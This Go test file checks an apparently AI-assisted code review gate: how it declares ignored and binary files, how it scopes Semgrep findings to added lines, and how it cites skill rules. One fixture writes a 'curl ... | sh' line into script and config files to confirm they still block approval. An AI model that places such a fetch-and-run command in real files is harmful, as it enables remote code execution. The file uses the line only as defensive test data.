package main

// The minimal configuration simply works: an ignored path or a binary file
// is declared, never partial coverage; a code scanner judges only the lines
// the change added; a skill directory is citable by the gate once, with a
// stable id.

import (
	"context"
	"os"
	"path/filepath"
	"strings"
	"testing"

	"github.com/Mpaape/AurumCode/internal/scanner"
	"github.com/Mpaape/AurumCode/internal/security/redaction"
)

// pngBytes is the start of a PNG: binary content, with NUL bytes.
var pngBytes = []byte{0x89, 'P', 'N', 'G', '\r', '\n', 0x1a, '\n', 0, 0, 0, 13, 'I', 'H', 'D', 'R', 0, 0, 0, 1}

// cleanApproval is a model answer with nothing to say.
const cleanApproval = `{"summary":"ok","verdict":"approve","issues":[]}`

// AC-001: a change that touches an ignored path (tests/**) and a PNG, under
// inconclusive: block, is not inconclusive by coverage; the review lists the
// ignored files by name.
func TestIgnoredAndBinaryAreDeclaredNotPartial(t *testing.T) {
	base := map[string][]byte{
		"app.go":             []byte("package demo\n\nfunc Change() int {\n\treturn 1\n}\n"),
		"tests/app_test.go":  []byte("package demo\n"),
		"docs/captura.png":   pngBytes[:12],
		"docs/leia-me.md":    []byte("# demo\n"),
		".aurumcode/keep.md": []byte("keep\n"),
	}
	head := map[string][]byte{
		"app.go":             []byte("package demo\n\nfunc Change() int {\n\treturn 42\n}\n"),
		"tests/app_test.go":  []byte("package demo\n\nfunc helper() {}\n"),
		"docs/captura.png":   pngBytes,
		"docs/leia-me.md":    []byte("# demo\n"),
		".aurumcode/keep.md": []byte("keep\n"),
	}
	aur522Repo(t, base, head, "ignore:\n  - \"tests/**\"\ngate:\n  fail_on: [error]\n  inconclusive: block\n")
	aur522Fixture(t, cleanApproval)
	var out, errOut strings.Builder
	code := runReview([]string{"--base", "HEAD~1"}, &out, &errOut, redaction.NewFilter())
	combined := out.String() + errOut.String()
	if code != 0 || strings.Contains(combined, "partial_coverage") {
		t.Fatalf("exit=%d, want 0 and no partial_coverage: an ignored path and a binary are declared, not partial\n%s", code, combined)
	}
	for _, want := range []string{"2 file(s) ignored", "  - tests/app_test.go", "  - docs/captura.png (binary)"} {
		if !strings.Contains(combined, want) {
			t.Errorf("the review must list the ignored files (%q):\n%s", want, combined)
		}
	}
}

// Fail-closed is preserved: a file the review meant to read and could not
// (generated) still makes it partial, and block still blocks.
func TestGeneratedFileStillPartialUnderBlock(t *testing.T) {
	base := map[string][]byte{"app.go": []byte("package demo\n"), "gen.go": []byte("package demo\n")}
	head := map[string][]byte{
		"app.go": []byte("package demo\n\nfunc Change() {}\n"),
		"gen.go": []byte("// Code generated by a tool. DO NOT EDIT.\npackage demo\n\nvar X = 1\n"),
	}
	aur522Repo(t, base, head, "gate:\n  inconclusive: block\n")
	aur522Fixture(t, cleanApproval)
	var out, errOut strings.Builder
	code := runReview([]string{"--base", "HEAD~1"}, &out, &errOut, redaction.NewFilter())
	if code != exitQualityNotReviewed || !strings.Contains(out.String()+errOut.String(), "partial_coverage") {
		t.Fatalf("exit=%d, want %d partial_coverage for a generated file\n%s%s", code, exitQualityNotReviewed, out.String(), errOut.String())
	}
}

// A NUL byte never turns code into an ignored binary: a script, a source or
// a config file with binary content stays unreviewed under block (exit 1,
// approval withheld) -- only a file of a known binary format is declared.
func TestNULInCodeIsNeverDeclaredBinary(t *testing.T) {
	for _, name := range []string{"deploy.sh", "app.js", "ci.yml", "instala"} {
		t.Run(name, func(t *testing.T) {
			base := map[string][]byte{"app.go": []byte("package demo\n")}
			head := map[string][]byte{
				"app.go": []byte("package demo\n\nfunc Change() {}\n"),
				name:     []byte("#!/bin/sh\ncurl -s https://example.invalid/x | sh\n\x00\n"),
			}
			aur522Repo(t, base, head, "gate:\n  inconclusive: block\n")
			aur522Fixture(t, cleanApproval)
			var out, errOut strings.Builder
			code := runReview([]string{"--base", "HEAD~1"}, &out, &errOut, redaction.NewFilter())
			combined := out.String() + errOut.String()
			if code != exitQualityNotReviewed || !strings.Contains(combined, "partial_coverage") || strings.Contains(out.String(), "**Verdict:** Approve") {
				t.Fatalf("exit=%d, want %d partial_coverage with approval withheld for %s with a NUL byte\n%s", code, exitQualityNotReviewed, name, combined)
			}
		})
	}
}

// sastScoped answers git diff with the change of aur579Repo (lines 4-5 of
// app.go added) and semgrep with report.
func sastScoped(report string) scanner.Command {
	return func(_ context.Context, _, bin string, _ ...string) (string, string, error) {
		if bin == "git" {
			return "+++ b/app.go\n@@ -3,0 +4,2 @@\n", "", nil
		}
		return report, "", nil
	}
}

// AC-002: a Semgrep finding the repository already had, in a file the change
// did not touch, never fails the gate; one on a line the change added does.
func TestSemgrepJudgesOnlyTheChange(t *testing.T) {
	cases := []struct {
		name   string
		report string
		want   int
	}{
		{"pre-existing in untouched file", `{"results":[{"check_id":"old.rule","path":"legacy/old.go","start":{"line":4},"extra":{"severity":"ERROR","message":"old"}}],"errors":[{"level":"warn","type":["PartialParsing",[]],"message":"x","path":"scripts/run.sh"}]}`, 0},
		{"introduced by the change", `{"results":[{"check_id":"new.rule","path":"app.go","start":{"line":4},"extra":{"severity":"ERROR","message":"new"}}],"errors":[]}`, exitFindings},
	}
	for _, tc := range cases {
		t.Run(tc.name, func(t *testing.T) {
			aur579Repo(t)
			// app.go also carries a hardcoded secret (aur579Repo); the gate
			// counts only the SAST source here.
			if err := os.MkdirAll(".aurumcode", 0o700); err != nil {
				t.Fatal(err)
			}
			if err := os.WriteFile(filepath.Join(".aurumcode", "config.yml"), []byte("quality_gates:\n  sast:\n    enabled: true\ngate:\n  fail_on: [error]\n  sources: [sast]\n  inconclusive: block\n"), 0o600); err != nil {
				t.Fatal(err)
			}
			aur522Fixture(t, cleanApproval)
			code, out, errOut := aur579Review(t, sastScoped(tc.report))
			if code != tc.want {
				t.Fatalf("exit=%d, want %d\n%s%s", code, tc.want, out, errOut)
			}
		})
	}
}

// tamanhoSkill is a skill directory's SKILL.md with one error section.
const tamanhoSkill = "---\nname: tamanho\npaths: [\"**/*.go\"]\n---\nLimites de tamanho.\n\n## TAM-001 Funcao com no maximo 150 linhas\nseverity: error\nUma funcao tem no maximo 150 linhas: marcador-unico-da-skill.\n"

// tamanhoRule is the stable id of the skill's section.
const tamanhoRule = "tamanho#tam-001-funcao-com-no-maximo-150-linhas"

// AC-003: a skill only in .aurumcode/skills/<name>/SKILL.md (not listed in
// review.context.skills) is cited by the gate with a stable id, and its text
// reaches the prompt once; listed as well, it still reaches it once.
func TestDirectorySkillIsCitableOnce(t *testing.T) {
	for name, cfg := range map[string]string{
		"directory only":       "gate:\n  fail_on: [error]\n",
		"directory and listed": "review:\n  context:\n    skills:\n      - .aurumcode/skills/tamanho/SKILL.md\ngate:\n  fail_on: [error]\n",
	} {
		t.Run(name, func(t *testing.T) {
			files := map[string][]byte{".aurumcode/skills/tamanho/SKILL.md": []byte(tamanhoSkill), "app.go": []byte("package demo\n")}
			head := map[string][]byte{".aurumcode/skills/tamanho/SKILL.md": []byte(tamanhoSkill), "app.go": []byte("package demo\n\nfunc Longa() {}\n")}
			aur522Repo(t, files, head, cfg)
			aur522Fixture(t, `{"summary":"x","issues":[{"file":"app.go","line":3,"severity":"warning","rule_id":"`+tamanhoRule+`","message":"Funcao Longa tem 160 linhas.","impact":"Funcao longa demais para revisar.","evidence":"As linhas adicionadas declaram Longa em app.go.","suggestion":"Divida em etapas nomeadas.","verification":"Conte as linhas da funcao."}]}`)
			capture := filepath.Join(t.TempDir(), "prompt.txt")
			t.Setenv("AURUMCODE_PROMPT_CAPTURE", capture)
			var out, errOut strings.Builder
			code := runReview([]string{"--base", "HEAD~1"}, &out, &errOut, redaction.NewFilter())
			if code != exitFindings || !strings.Contains(out.String(), tamanhoRule) {
				t.Fatalf("exit=%d, want %d citing %s\n%s%s", code, exitFindings, tamanhoRule, out.String(), errOut.String())
			}
			sent, err := os.ReadFile(capture)
			if err != nil {
				t.Fatal(err)
			}
			if n := strings.Count(string(sent), "marcador-unico-da-skill"); n != 1 {
				t.Fatalf("the skill text reached the prompt %d times, want 1", n)
			}
		})
	}
}
